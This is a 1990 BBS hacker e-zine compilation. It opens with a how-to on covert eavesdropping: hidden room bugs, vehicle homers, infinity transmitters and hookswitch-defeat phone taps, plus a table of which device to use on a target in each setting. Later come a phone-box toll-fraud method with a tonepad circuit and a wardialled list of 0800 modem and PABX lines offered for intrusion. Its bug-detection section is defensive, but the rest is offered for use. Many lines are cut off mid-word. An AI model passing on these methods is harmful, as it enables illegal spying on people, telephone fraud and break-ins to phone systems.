Contact Mics. Spikes. Tube Mics.
This allows the eavesdropper to listen in on someone in the next room, they
come in several types.
Contact Mics
These mics respond to vibrations in a sounding board like a door, and are
available as pickups for guitars etc. The sounding board can be a door, a
window, or a thin wall and only need to be pressed or glued to the board.
As the wall gets thicker it is harder ( if not impossible ) to use a contact
mic. this can be solved with ....
Spikes
A spike is a spike of hardened steel which is hammered into the wall and nearl
comeout at the other end - but not quite, then a microphone is mounted on the
spike which will pick up the vibrations from the next room.
Tube Mikes
These are simply microphones in a sealed box with a small plastic tube
protruding from it. Then connect the mic to an amplifier and then stick the
tube where u want (a keyhole) and then listen. You can drill a hole in the wal
or use the back to back sockets in hotels, if drilling make sure that no bits
plaster fall off - common method of detection.
Range: Next room or can be used with a transmitter
Conditions: Just needs to be close
Cost: The mics are cheap but the radio bugs and associated equipment can be
expensive
Small Directional Mics.
These are designed to be used at short distances and directional so they can
pick up a conversation. Can be mounted in a briefcase or in a pen etc. and mus
be aimed at the target - the briefcase one can be conected to a tape recorder.
Pen or sleeve types can be connected to a pocket recorder. A variation is a MI
mounted in a small bell shaped object and is held in the hand, then you walk i
front of the trget and they will not suspects anyone following from the front.
Range: Small and can pick up a lot of background noise
Conditions: Useless in a crowded street, or with something between target and
Cost: Relatively cheap.
Shotugn, Machine Gun, Rifle Mics.
These are long distance directional microphones, and often have handles and
can resemble guns ( be careful when aiming one of these at someone as they
might think it is a gun and you might not be wearing a bullet proof vest).
These are then hooked up to an amplifier or tape recorder, swing from left
to right and stop when sound is loudest. These can be difficult to conceal
and difficult to aim, also without a frequency analyser to level out sounds
any background noise can drown the conversation.
Range: can be several hundred feet Conditions: calm weather and quiet
Cost: expensive with amp and accesories
Parabolic Mics.
These are very like rifle mikes, usually a large circular metal or plastic dis
which reflects sound to a microphone mounted in the centre of the dish. They
are not as sensitve as rifle mics. but are a lot cheaper, they are bulky thoug
and difficult to hide. You can hide a rifle mike under a long coat but not a
dish unless your a woman who happens to be pregnant. Can use bird song
recording as a cover - with a bird book in your pocket etc. tweed jacket.
Condenser or Crystal mics best for long range devices, output is usually highe
than dynamic mics. These can be bought anywhere - cheap.
Range: can be several hundred feet Conditions: calm weather and quiet
Cost: expensive with amp and accesories
Like rifle MIC.
Radio Bugs
This is a small transmitter with a microphone. The devices can be combined to
perform as a reciever and a microphone ( used in mind reading acts ). They are
broadly split into two types - those which power them selves and those which
draw power from some source. Bear inmind the size also has to include the
antenna which can be several inches long. There is a problem of signal drift
which can be overcome with a crystal control - but this requires more power.
If they are not diguised they can be a dead give away ( they reciver doesn`t
need to be disguised as the bugs can be tuned to operate on FM (VHF) or AM so
just listen in your radio or car radio), to get around this several novel
methods of disguise have been used.
Martini Olive Bug
This is designed to look like an olive on a cocktail stick, the transmitter
is the olive and the antenna the stick. Range about fifty feet and can functio
happily at the bottom of the glass.
Sugar-Cube Bug
This has two audio frequency circuits and three radio frequency circuits.
Sealed in a protective silicon shell designed to resemble a sugar cube. Can
transmit while at the bottom of a cup of coffee.
Pen Bug
Ball point or fountain pen and switched on by twisting the barrel or removing
the cap and placing on the other end and they write.
Calulator Bug
Transmitter is built into a popular calculator which will function normally
and can draw power from the calculator battery.
Plug Bug
Looks like a standard 13 amp plug but has a transmitter whihc has own battery
or can draw power from mains. Also can use earth wire as antenna.
Adaptor Bug.
Works like an ordinary plug but transmitter built in , can use mains power.
Light Switch Bug
Built into the back of a rocker type light switch and draws power from mains
supply - two models available - one which is on all the time and one which
transmits only when the light is on.
A problem with all these bugs is the limited battery life, there are several
methods of extending battery life. Vox activated - these have a preset level
at which they will switch on and a delay when they stop (so they dont stop whi
there is a gap in a sentance) but because of the switch the bug is bigger.
Another method is to incorporate a timer circuit and this will turn the bug
on and off when set ( digital watch technology) can be set 9-5 when people are
in offices. A more expensive way is to use a radio controlled bug, a coded
signal is sent to activate the bug and then it switches off after two minutes.
Very expensive though.
HOMERS
These are radio transmitters used to track someone, it is simply a transmitter
which sends high powered pulses and a reciever picks them up as a series of
beeps, the transmitter is usually the size of a cigarette packet and has a sho
rigid aerial sticking out and a couple of powerful magnets to hold it onto the
car. The receivers depend on what you can afford, simplest is one with no
direction capabitlity and relies on volume - the closer you get the louder it
gets. Then there are those which indicate direction , this can be a vertically
mounted loop aerial or a pair of aerials on on each side of the vehicle. When
you pick up the sound turn until it is loudest then you are in the same plane
as the homer then you can gauge how far away by the speed of the beeps ( the
faster the closer) this plane can be behind you as well as in front though.
Some extra features are range control - you switch as you get closer e.g
1st settings beeps until a continuous tone then within 6 miles, then 2nd setti
this goes into a continuous tone within one mile etc. Another feature can be t
null switch , if the target is directly in front or behind you there is no sou
if the target moves left or right you will get a tone ( different for left and
right). Doppler shift recievers will tell you in which direction the target i
moving but its expensive.
Homing people can be done by incorporating the homer into a card ( business or
credit, make sure its think or coloured so the electronics can`t be seen) but
you canot have a battery so it relies on the radiation given out by Tv sets an
radio`s and other electrical appliances and converts them into a series of bee
They are only suitable for close work.
Laser Bug
This is rather like a contact mike as it relies on the vibrations produced by
sound on the window, it reflects light waves and when they hit the window they
will be modulated slightly. Feed a pulsed power supply to a laser and direct t
beam at the window and some of this light will be reflected back, use a good
astronomical telescope to focus the light and then it passes through a pinhole
and onto a photomultiplier tube. The tube and its electronics detects variatio
in pulse width and translates them back into sound. Infra red can be used, but
you will have to use an ordinary light source to target it. Another way is to
use cd lasers to pick up conversations and transmit them to a receiver miles
away but you will have to line it up VERY accurately. It is also hard to detec
or stumble across accidently.
Infra Red Transmitter
This can transmit up to 500 metres and is similar to a radio bug, the bug
must be by a window though and a special reciever is needed ( maybe in a camer
Telephone Tapping
Tapping telephones can be done several ways and each relies on different
equipment.
Inductive Tap
Induction microphones are very cheap and be bought anywhere , they are a
couple of inches long and about half an inch across (cylindrical), it has two
wires coming out of one end and a sucker on teh other end. The wiring can go t
a tape recorded or an amplifier, obviu\ously this can`t be used but there are
mics which are disguised as pads or other desk objects, in most cases a minatu
amplifier is needed. Another type fits over the phone line and alos houses a
transmitter also it doesn`t cut into the cable although the sound is weak.
Alos note that they can be detected if a radio transmitter is built in and the
can pick up humming from electrical devices.
Radio Tap
These are transmitting bugs specifically designed for use with phones. The mos
common device in the ...
Drop in Mike
This is so called as in america the microphone just had to be unscrewed and th
new transmitter dropped in. It draws its power from the phone and needs no
maintenance. It acts like a normal microphone and transmits all conversations.
Series an Parallel
The obvious difference between these is the way in which theuy are connected t
the phone line, the parallel is connected over both lines whereas the series
is connected over one, they can both incorporate a small transmitter.
The Parallel bug can be line or battery powered, but you can get the best of
both worlds by having them trickle charged - it draws minute quantities and is
difficult to detect via a meter. Battery powered versions are said to have a
better range and they operate all the time so could lead to detection. No
wires have to be cut to install this bug.
The series bug is more common and cheaper, it can be batery or line powered b
will only transmit when the phone is in use - this makes detection difficult.
The line powered versions are smaller , about an inch square and half an inch
think - hiding it in a phone or junction box is easy.
Third Wire Bug
These bugs are connected in paralleland normally line powered although a
rechargable battery version is available. Average size is around 1 and half
inches by half an inch, it operates like a prallel bug but when not in use
switches to its own internal microphone and transmits souns from the room,
this is reputedly favourite amongst USA law enforcement agencies.
Infinity Transmitter
These are around the size of a third wire bug and are the most exotic type of
bug. They cannot monitor telephone conversations but the device is line
powered and can be connected anywhere along the phone line ( or inside the
phone) the person calls the target and then sends a tone down the line which
activates the Bug. The tone is matched to a reciving unit in the bug and thus
they are also known as Harmonica bugs. The bug cancels the bell of the
victim's phone and uses an internal mic or the phones mic to send the room
conversation down the line - note that these cannot be used wher ther is a
switchboard due to the direct dialling technique. There are several variaitons
of this bug - One device waits for the eavesdropper to dail and then expects a
tone immediately this cancels the bell so it doesn't even ring. However the
bell could ring and alert the victim. Another device waits for the victim to
answer and then says he has a wrong number, when the victim hangs up the
device is activated. Another device automatically cuts out the handset if the
phone is lifted so operates normally, some cut off after a certain amount of
time, some incorporate an led so that installation is easy as the light will b
on if installed correctly. They don't need batteries or further attention
once installed. They are very difficult to detect and even the phone company
can miss it if its off.
Hookswitch Defeat
This is the switch the handset is dropped onto, by defeating this the micropho
will still be activated and you can listen in. The defeat can be done by a
resistor connected across the switch - an amplifier would be needed on the
listeners side as the volume level will be low. The method is to call up say
that you have a wrong number and then don't hang up when he does, then listen
Although this can work for anyone else too so some are remote controlled. (ton
or radio activated). They are hard to detect and cheap, ( can`t detect as its
only one component).
Drop Out Relay
These are widely available and are just electronic switches which switch on
whenever the phone is in use. Some have their own batteries or line powered
and can activate taperecorders etc. by the raly - just clip on and put the
other lead in the tape recorder. They are easy to install and can be used
legitimately.
Lost Transmitters
This is a bug which is designed to blend in with the electrical components
- they are wired into the circuit board and transmit whenever it is in use
and will pick up sounds from the room. These are very expensive if one is foun
this means you are dealing with some very nasty people.
Direct Tap
All you need is a pair of high impedence head phones and connected to the line
via crocodile clips with a capacitor in between to keep out the phone companie
electricity. There are many disadvantages as it is very easy to spot and when
installing and produce clicking noises on the line. A higher voltage will pass
through the lines or terminals and this can be detected by a meter or bulb, th
headphones can be replaced by a tranformer and then to a tape recorder.
Excellent Quality.
Ok so there are the bugs now how the F**K do you find them!
BUGGING - Guidelines
Stick to these if possible, use own judgement in special situations.
Situation Device Used Remarks
Rural Rifle,MIC. Bulky, difficult to conceal,
Location Parabolic mic. need little background noise
and good weather.
Urban Small Directional Difficult to operate in
Location MIC. crowded streets. Background
noise a problem.
Vehicle Radio bug, Am- FM Power a problem unless
VHF, connected to car power.
Can pick up interference fro
vehicle electrics, effecienc
will fluctuate as receiver
will have to follow close
behind.
Tape Recorder Normally lots of space in ca
( dash, under seat ), but ne
change tapes. Quality and
reliability excellent.
Restaurants etc. Concealed directional Easy to use, good quality,
Mike. Get close to target. Table b
wall - less background noise
use less against noisy room.
Offices/Rooms Tape Recorder Difficult to conceal and nee
with access. regular access - excellent
quality.
Wired Mic. Range limited to length of w
can be time consuming to
install - may lead to detect
no further attention after
installation. Quality very
good.
Radio Bug Battery type have a limited
life but more flexible in
installation. 100 yard range
quality can be very poor.
use VOX ( voice activate) to
reduce detection.
Hookswitch Defeat Open telephone MIC. room
conservation carried down li
Resistor, capacitor or diode
can be used.Can be missed by
physical search. Works Well.
Office/Room
Without access Contact Mic. Easy and quick, install on
window, door, or wall. Good
results depends on thickness
of wall ( sounding board ).
Difficult to detect.
Tube Mic. Can be pushed through cracks
wall, through keyholes, unde
doors, in back to back socke
installation canbe noisy
(drill holes), work well.
Very difficult to detect.
Spike Mic. Noisy and difficult to insta
but can work well. Difficult
detect. But can be detected
metal detector.
Infinity Transmitter Fitted easily along phone li
carries conversation anywher
works, good quality and hard
to detect.
Laser Bug Safest way, but expensive.
Telephone Tapping
Type Remarks
Direct Tap Simple to install, especially at terminal box,
Headphones can be used, or drop out relay and recorde
Very good quality.
Inductive Tap No connections needed, easy to install but has to be
close to phone, needs wiring to transmitter - can be
easy to detect. Quality is poor.
Series or Parallel Can be connected anywhere along the line or concealed
Tap in phone or junction box. Transmits phone conversatio
to receiver, poor quality ( as in radio bug) but can
power from line or battery.
Third Wire Bug As above but transmits romm conversation when phone n
in use.
Lost transmitter Made to blend in with background of electronics
components - expensive, dificult to fit but equally
difficult to detect.
Drop in Bug Simple to install and some difficult to detect by
physical search. Needs no attention and is reliable.
Detecting
1. Physical search - start outside the house and walk slowly around it and
examine eveything carefully, look for any wires going int
Outside House the walls and make sure you know what they are for and
follow them back to the pole etc. look for wires spliced
into the cable, particularly in the top of the pole. Ther
may be an inspection hatch if the cables go under ground
so try and lift and inspect it. If in a large building
look in the terminal box for any wires across terminals i
anything suspicious is found then call the company. While
walking outside examine the windows ( frames as well) loo
for signs of disturbance.
Inside House Examine ALL furniture, check backs and drawers, wardrobes
etc. Look under beds - under the fabric underneath, look
for holes, bedrooms are favourite. Standard bugs have a w
trailing from them, and a battery on the outside. Don`t
forget all the disguised bugs and any household ornaments
remnove green felt or feel underneath for holes.Ask where
all objects came from, look at all pictures and frames ma
sure they haven`t been tampered with . Examine walls,
ceilings and floors, also curtains and pelmets, roll back
carpets and examine floorboards. Anything suspicious then
take up the floor boards and have a look. Look for any
suspicious wires tucked under the edges of carpets. Alway
examine ceilings from above if possible, especially in
bedrooms, wear overalls. If only from below have a look
at flaking paint in walls and ceiling and look for mis-
matched areas of paint. Examine any holes but check for
electrical wires etc. first. Houses and apartments with
party walls have problems, the best way to see these is t
check for flaking paint or small holes. Don`t go round to
neighbours whenn found - they aren`t going to let you in
they have bugged you. You can dig away at the wall and kn
the spike out. Holes for tube mikes can be blocked up wit
plaster filler effectively knocking it out. Switch off th
mains and look at light sockets ( unscrew ), and look for
any extra components. With the power unscrew the ceiling
roses and take a look inside, also any other light
fittings.
The telephone Pickup the handset and unscrew, examine the telephone
thoroughly, small bkack cubes with wires are trouble, che
the hookswitch action, make sure it shuts off the mic,
examine all wires thoroughly and see where they go, check
to see if any are thinnner or thicker and if they use pro
terminals or not. Put phone back together and check junct
box, look at terminals and check telegraph pole and the
junction box at the top.
2. Electrical First use metal detector,check walls, celings, floors any
pipes will run in a straight line , helpful to know where
the pipes etc. run Check any ornaments with the detector
shake ornaments and check weight, look at base for holes
covered with filler.
If no equipment use VHF radio and turn control to see if
any screech happens, put next to phone if screech then th
line bug, make a call and test again , check junction box
same way, Use tv with indoor aerial, make a loud noise an
turn tv down and tune tv - if a bug then horizontal lines
appear which wil jump to the music - nearer the bug large
the jump, - this will pick up the bug ( if VHF) from a
distance away , send the sound source to several adjoinin
rooms to detect bugs further away. If found carry on onto
rest of bandwidth, get someone to make a call and check
again. examine terminal box - voltage between terminals
should be 46-50v if lower may be a bug in parallel, infin
drop till under 10, lift handset measure voltage 2-12v. i
higher then something connected in series (series bug).
Open phone and check microphone terminals - hold down hoo
switch and if voltage across mic then hookswitch defeat e
Check volts across terminal while sending tones down line
Examine car, underneath for homers, look at woring for
splicing and under dash, feedback search,
Deterrence Paint a thin stripe of nail varnish across gaps, tighten
screws then undo by a quarter or 3/4 then make a note of
where the slots and the screws are. Apply to junction box
too. Check all people coming in and restrict entry - watc
at all times. If to toilet go to bedroom and find summit
do. If bug found hold a bait meeting to lure eaves droppe
If not return to bug and drain bettery so has to replace.
if bug reconnect wire several times while making a call,
series jiggle the hookswitch and then cut off bug.
Training Use labur force, Carbon ribbons just dumped in bin wherea
documents shredded. Short hand pads left in drawer docume
locked away. People wander around freely - ask who - if
be careful of security etc. car phone a big risk and
portable or freeway wireless ones. use phones far away fr
hotels etc. use different tables at restaurants etc. lase
bug prevent heavy curtains blinds etc. and clean windows
( dirty ones reflect more) - itemised phone bills, cellul
radio - big brother - easy to detect, satellite,
Detecting Bugs
This can be quite cheap and easy.
Field Strength Meter
This is bascially a crystal radio set connected to a meter instead of a speake
It shows the power output of any transmitter in the vicinity and is sold as an
aid to ham radio operators. The sensitivity is low so detection should not be
further than 12 inches away from the bug. If it does detect something the need
will swing across so the furthest swing will be closest to the meter. A proble
can be that they will react to a passing polics car or a commercial radio
station. If one is bought with a receiver circuit then it is tunable so you ca
tune into the frequency of the bug. Also an amplifier can aid detection.
Feed Back Detector
When a transmitter gets to close to a receiver then feedback is produced ( if
at the same frequency). This type of detector relies on feedback and is couple
to an amplifier and a receiver circuit. When using these you will need a noise
for the bug to transmit ( singing etc.) ,Then you simply scan through the
frequencies and if there is a bug transmitting you will get a squeal as the
detector hits the same frequency.
The Feedback detector generally has a further range but can tip off an
eavesdropper because of the noise.
Telephone Analyser
This is expensive equipment which will carry out a series of tests on a phone
line semi automatically. These are particularly useful when dealing with
complicated phone set ups like a switchboard. Tracing an individual pair of
wires without one of these can be tedious.
The tests actually carried out vary from machine to machine, they usually come
in attache cases and are battery powered. The first test will be to measure th
voltage across a phone line when the phone is on and off the hook. If the volt
is lower than it should be it may be a bug. If the voltage at the mic is too h
then it could be a bug. There is no difference between this and an ordinary vo
meter. The next test is a tone sweep, the analyser sweeps through the spectrum
and then if anything which reacts to a tone is on the line it will reduce the
voltage on the line and the analyser will detect this, stop and give you a
warning.
The next test is high voltage pulsing a charge is built up then fired down the
line, some hookswitch defeats use a change of voltage to trigger them, if
a hook switch is activated the analyser will pick up the voltage of the
microphone and the alarm will go off.
Another test is audio listening, the operator will listen to the line and an
acoustic generator is switched on. If the operator hears a tone down the line
then some osrt of hookswitch defeat is in operation, this method can also dete
infinity transmitters as any noise will be transmitted down the line which the
operator will hear. Each individual wire is tested against each other to see i
the sound from the generator is being transmitted down the phone line. (n.b.
tone has to be around voice frequency).
Any good analyser wil test al these any may even test for conductive paint on
casing being used.
Spectrum Analyser
This sweeps entire frequency bands in the same way as a field strength meter
searches for radiation. A typical sophisticated Spectrum Analyser can sweep
between 20 kilohertz and 2000 megahertz. Some can do this all in one go or in
separate plug in modules. It should carry out the scan automatically and when
it detects a transmission it will stop and display the frequency, and the
strength of the signal on a field strength meter and let you listen to the
transmission on an internal speaker. Some analysers have a cathode ray tube
as an oscilloscope to display the waveform and even buy another CRT which show
the frequency versus amplitude of demodulated components of the primary signal
such as subcarriers, and a second frequency indicator for the subcarrier.
You can pick up a spectrum analyser which detects RF radiation including singl
sideband, pulse width transmissions and those with the carrier wave removed, o
a very wide band coverage.
Cable Checkers
This is just a portable metal detector to see where mysterious wiring is going
they can be bought anywhere. Also a screamer is available which will detect
whther there is a microphone on either end and the MIC will emit a loud noise
and so can be located. Also you can use an inductive mic and an amplifier to
check to see if anything is on the line.
Detectors can be built using a field strength meter and replacing it with a
led, some have a sensitivity control.
Another way to detect a bug is to install a telephone watchdog which detects
the resistance or capacitance of the line, if anybody cuts in or installs a bu
the devices led will go on - this will only respond to change so any bug on
already wil not be detected.
Scramblers - simple scramblers are available, but so are descrambler`s. The
more expensive scramblers alter the frequency and parts of speech around 650
to 750 times a second. These can virtually defeat any attempt to descramble,
except of course the american security agency.
Jammers - these are simply wide band transmitters which transmit white noise.
these will also jam tv`s radios etc....Another jammer uses two high frequency
transmitters and will cause any microphone to squeal at the difference between
the two. Another magnetically induces an intense noise in the handset micropho
which will block any infinity or hookswitch defeats. Any contact mics can be
jammed by buzzers or vibrators stuck to the window or sounding board.
THE detector - all bugs use at least one semi conductor, if an ultra high
freqency carrier wave is emmited it will be radiated back by the bug. This
radiation will contain strong harmonic components - ( a harmonic is a componen
where the frequency is an exact numerical multiple of the fundamental or
strongest frequency. This strongest frequency is the first harmonic, twice the
frequency is the second harmonic and so on.). Other objects will only radiate
back to the second harmonic and only a semi-conductor junction will produce a
third harmonic. A small UHF transmitter and a reciver tuned to the third
harmonic is all that is needed ( use like a field strength meter), the radiati
emitted back will be minute so teh detector will be expensive and have to be v
close to the bug.
--------------------- Palm Beach BBS - +44(303)-265979 -----------------------
----------------------------------------------------------------------------
| |
| ELEKTRIX Issue 1 - Part 4 |
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
| |
| Make your own Tonepad for Phone Box phreaking |
| by Maxhack |
| |
| PALM BEACH BB UK ++44(303)-265979 |
| |
----------------------------------------------------------------------------
The Technique
Some weeks ago free dialling with tonepads came to the news in a daily
newspaper. Since then there has been much in the way of media hype covering
these devices in computer magazines and hackers files. This file will, I
hope,make the whole practise clear and the method easy and also less costly
than previously.
The way it works is as follows: The technique will ONLY work from phone
boxes contrary to what you may have been told. You may also find that it is
not working on some London phone boxes - this is due to the fact that many
have been modified to disallow phreakers from using the method.
The technique relies on the fact that dialling 999 on a phone box auto-
matically disconnects the charging mechanism whilst the call is being made.
The tonepads which allow people to make free calls are just portable models
of the tone-dialling telephone circuits that are in your telephones and in
modern modems. The tones they generate are perfectly 'legal' and are simply
used in portable units for Computerdial services (Share price indexes,etc.)
for travelling businessmen and other groups who may use such services (like
voice mail or whatever). All you do is the following:
[1] Go to a phone box.
[2] Dial the number you wish to connect to using the keypad.
[3] As soon as the phone starts ringing dial 999 on the phonebox machine as
fast as possible. This will have cut the charging mechanism and you will
have a free call.
* For boxes that have been modified......Simply put 10p in first then do *
* it - you won't loose your money but you will still make a free call. *
* This has to be done since they are modified so that they won't dial a *
* number (except 999/linkline 0800/government) unless money has been dep *
* osited in the machine.
Method 1
--------
You can record the tones required to dial a number onto a tape and then
play them down the telephone with a standard taperecorder. This has three
main drawbacks however although it is the least costly method.
1) You will need to record a different set of tones for each number. So un-
less you dial a few numbers repeatedly then you are going to find this
method very tiresome. You'll need to have a DTMF modem/phone too.
2) The phone system requires that each tone is within 1.5% of the specified
frequencies. This will prove to be difficult if you don't own very good
recording equipment.
3) You will look very conspicuous playing around with a tape recorder in a
phone box.
Despite the disadvantages it has to be remembered that this method is the
cheapest option open to you.
Method 2
--------
This involves building your own portable tonepad (unless you want to fork
out ?12-50 for a Tandy one). The device is small, effective and relatively
cheap.
One method is as follows:
[Battery] _______
+9V --------|6 |----<14-----123
| |----<13-----456 Numeric Keypad lines
| |----<12-----789
--------|16 |----<11-----*0#
[Speaker] S | |----<3------'||
--------|1 |----<4-------'|
| | | |----<5--------'
| --|15 7|---
| | | X [3.579545 MHz Crystal]
| | 8|---
| -------
GND TCM5087
(-Ve on battery)
That way is simple to build since few components are needed...get a keypad
off an old remote controller or something...or make your own from Push-to-
make switches. Other methods include using two 555s to generate the tones
or two 8037s (wave form gen. chips) though this is a little too expensive
for my liking and only needs more complex circuitry.
If you intend to use 555s then you'll need a monostable on each 555 and the
frequencies used are as follows:
* - 941 & 1209 Hz
# - 941 & 1477 Hz
0 - 941 & 1336 Hz
1 - 697 & 1209 Hz
2 - 697 & 1336 Hz
3 - 697 & 1477 Hz
4 - 770 & 1209 Hz
5 - 770 & 1306 Hz
6 - 770 & 1477 Hz
7 - 852 & 1209 Hz
8 - 852 & 1336 Hz
9 - 852 & 1477 Hz
-------------------- Palm Beach BBS ++44(303)-265979 -----------------------
----------------------------------------------------------------------------
| |
| ELEKTRIX Issue 1 - Part 5 |
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
| |
| Freefone interrogation - the ultimate listing |
| by Agent 7 |
| |
| PALM BEACH BB UK ++44(303)-265979 |
| |
----------------------------------------------------------------------------
I have undertaken a massive dial through of LINKLINE (0800) numbers to be
listed in this and forthcoming issues of ELEKTRIX. All were known to be in
working order when this first issue went out - May 1990. Some you may have
seen before - others you won't. I've simply collected all the known ones I
could find which were still working and listed useful information for each.
Since there seems to be much going on with Voice mailboxes, computerdial,
test lines, and PABX hacking lately I have included these too with comments
where appropriate as well as the standard modem lines. Since on occasions a
great many numbers 'side by side' have been engaged at the same time I have
included this since it may give clues to the nature of the line-use should
you wish to pursue these.
The ranges that I have dialled through myself have not always been in a
logical fashion - but then it gets real boring dialling through 1000 dead
numbers. So I try to vary it. But the results have been reasonable. If you
have made any dials through 0800 or just modem wardials then please let us
have the results so we can share them with others - it's also pointless two
people dialling through the same ranges.
I hope these lists bring you much fun! Regards Pop
Key: node = (xxx---)
number = (---xxx)
Node info:
321 - This seems to be a test area for BT's latest projects (voicedial,
computerdial, intelligent fax services etc.)
node number results notes
---- ------ ------- -----
321 100 computerdial Announced as 'Remote Update', it
requires 3 digit service codes.
101-109 no service
110 digital recording 'This service is no longer avail-
able'.
111 digital recording 'Goodbye'.
112 digital recording 'Goodbye'.
113 digital recording 'Please press start on your fax
+ fax response machine'.
114-115 computerdial British Telecom Weather Centre.
+ optional fax With voice + fax forecasts.
116 digital recording 'Goodbye'.
117 digital recording 'This is 0800 briefing'.
+ fax response
118 computerdial Puzzleline test service.
+ optional fax
119 computerdial BTRL estate agency test service.
120 PABX computerdial In the form xxx. 580 - 0800 Brief
Response#1 'That number is not
listed.'
Response#2 'That number was not
specified correctly.'
121-123 fax response
124-126 PABX computerdial
127-129 fax response
130-139 rings and rings
140-141 No service
142 Engaged
143 No service
144 Engaged
145-146 No service
147 rings and rings
148-149 No service
150-179 Engaged
180-199 rings and rings
282 443 MODEM 2400 Does nothing
809 Weird Autoanswers then nothing
861 MODEM 1200/75
871 MODEM 1200 8/N/1 Does nothing
289 237 STRANGE TONES
384 Voice recording '45-55' - Weird
485 MODEM 1200/75
643 MODEM 2400 The old US dialout
783 MODEM 1200/75
817 MODEM 1200 7/E/1 Comes up with '+++ ? ERROR'
CTRL-E gives '28301 DMLDN G'
Enter SYS - gives '+++ STF GO�'
456 100 Computerdial BT Service centre computerdial sys
521 509 MODEM 2400 Weird prompt
585 111 MODEM 1200/75 Cambridge PSS port - not connected
891 002 PABX Resource line DTMF then * code
004 AT&T CARD PABX Calling card service
831 MODEM 2400 Yale Direct login
898 058 PABX
Uptodate list to be included in each ELEKTRIX issue.....
-------------------- Palm Beach BBS ++44(303)-265979 -----------------------
|
|
